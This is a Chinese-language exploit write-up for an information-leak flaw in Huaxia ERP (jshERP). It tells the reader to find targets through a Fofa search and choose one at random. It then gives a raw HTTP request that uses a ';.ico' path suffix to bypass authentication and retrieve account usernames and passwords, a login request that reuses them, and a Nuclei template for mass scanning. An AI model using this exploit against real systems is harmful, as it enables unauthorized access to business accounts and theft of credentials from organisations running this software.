华夏ERP信息泄露漏洞

信息描述

华夏ERP是一种企业资源规划（ERP）软件，旨在为企业提供全面的信息管理和集成解决方案，以提高效率、降低成本并优化业务流程。该软件可以帮助企业管理各种业务功能，例如财务、销售、采购、库存、生产计划等。它还具有报告和分析功能，使企业能够更好地了解其业务运营情况。华夏ERP通常用于中小型企业。华夏ERP前台泄露了某api接口，恶意攻击者可通过调用该接口，对用户的账号和密码进行非授权访问。

漏洞复现

步骤一：在Fofa中搜索以下语法并随机确定要进行攻击测试的目标....

#Fofa搜索语法"jshERP-boot"

步骤二：开启代理并打开BP对其首页进行抓包拦截....修改请求头内容....在响应包中可以看到json格式的用户名密码。

GET /jshERP-boot/user/getAllList;.ico HTTP/1.1Host: IPUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.5845.111 Safari/537.36Accept: */*Referer: http://1.12.225.89/Accept-Encoding: gzip, deflate, brAccept-Language: zh-CN,zh;q=0.9Connection: close

步骤三：抓取登录数据包，替换用户名密码即可登入系统。

POST /jshERP-boot/user/login HTTP/1.1Host: youripContent-Length: 68Accept: application/json, text/plain, */*User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.5845.111 Safari/537.36Content-Type: application/json;charset=UTF-8Origin:Referer: Accept-Encoding: gzip, deflate, brAccept-Language: zh-CN,zh;q=0.9Connection: close{"loginName":"loginname","password":"password"}

批量脚本

id: huaxiaERP-information-leakageinfo:  name: huaxiaERP-information-leakage  author:xingyun  severity: medium  description: 华夏ERP信息泄露requests:  - method: GET    path:      - "{{BaseURL}}/jshERP-boot/user/getAllList;.ico"                 matchers-condition: and          matchers:           - type: status        status:          - 200      - type: word        words:          - "username"